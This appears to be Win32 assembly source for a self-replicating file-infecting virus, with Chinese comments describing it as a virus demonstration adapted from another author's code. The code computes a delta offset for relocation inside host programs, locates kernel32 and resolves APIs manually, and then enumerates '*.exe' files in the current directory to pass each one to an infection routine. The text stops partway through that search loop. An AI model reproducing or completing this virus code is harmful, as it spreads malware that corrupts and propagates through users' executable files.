;本程序修改自hume的代码,其版权信息如下:
CopyRight db "The SoftWare WAS OFFERRED by Hume[AfO]",0dh,0ah
db " Thx for using it!",0dh,0ah
db "Contact: Humewen@21cn.com",0dh,0ah
db " humeasm.yeah.net",0dh,0ah
db "The add Code SiZe:(heX)"
;------------------------------------------------------------------------------------------------------------------------
;main.asm代码
;-----------------------------------------------------------------------------------------------------------------------
.586
.model flat, stdcall
option casemap :none ; case sensitive
include windows.inc
include user32.inc
include comctl32.inc
includelib comctl32.lib
includelib user32.lib
;;--------------
GetApiA proto :DWORD,:DWORD
;;--------------
.CODE
_Start0:
invoke InitCommonControls
jmp __Start
VirusLen = vEnd-vBegin ;Virus 长度
vBegin:
;-----------------------------------------
include s_api.asm ;查找需要的api地址
;-----------------------------------------
fsize dd ?
hfile dd ?
hMap dd ?
pMem dd ?
;-----------------------------------------
pe_Header dd ?
sec_align dd ?
file_align dd ?
newEip dd ?
oldEip dd ?
oldEipTemp dd ?
inc_size dd ?
oldEnd dd ?
hFind dd ?
sFindData WIN32_FIND_DATA <?>
readSize dd 0
readBuff db 10 dup(0)
;-----------------------------------------
sFindStr db "*.exe",0
sMessageBoxA db "MessageBoxA",0
aMessageBoxA dd 0
;;临时变量...
sztit db "病毒演示",0
szMsg db "感染此病毒的程序会显示该信息",0dh,0ah
db "同时具有再感染其它程序的功能",0dh,0ah
db "病毒代码长度:(HEX)"
val dd 0,0,0,0
;;-----------------------------------------
__Start:
call _gd
_gd:
pop ebp ;得到delta地址
sub ebp,offset _gd ;因为在其他程序中基址可能不是默认的所以需要重定位
mov dword ptr [ebp+appBase],ebp ;呵呵仔细想想
mov eax,[esp] ;返回地址
xor edx,edx
getK32Base:
dec eax ;逐字节比较验证
mov dx,word ptr [eax+IMAGE_DOS_HEADER.e_lfanew] ;就是ecx+3ch
test dx,0f000h ;Dos Header+stub不可能太大,超过4096byte
jnz getK32Base ;加速检验
cmp eax,dword ptr [eax+edx+IMAGE_NT_HEADERS.OptionalHeader.ImageBase]
jnz getK32Base ;看Image_Base值是否等于ecx即模块起始值,
mov [ebp+k32Base],eax ;如果是,就认为找到kernel32的Base值
lea edi,[ebp+aGetModuleHandle]
lea esi,[ebp+lpApiAddrs]
lop_get:
lodsd
cmp eax,0
jz End_Get
add eax,ebp
push eax
push dword ptr [ebp+k32Base]
call GetApiA
stosd
jmp lop_get ;获得api地址,参见s_api文件
End_Get:
include dislen.asm
find_start:
lea eax,[ebp+sFindData]
push eax
lea eax,[ebp+sFindStr]
push eax
call [ebp+aFindFirstFile]
mov [ebp+hFind],eax
cmp eax,INVALID_HANDLE_VALUE
je find_exit
find_next:
call my_infect
lea eax,[ebp+sFindData]
push eax
push [ebp+hFind]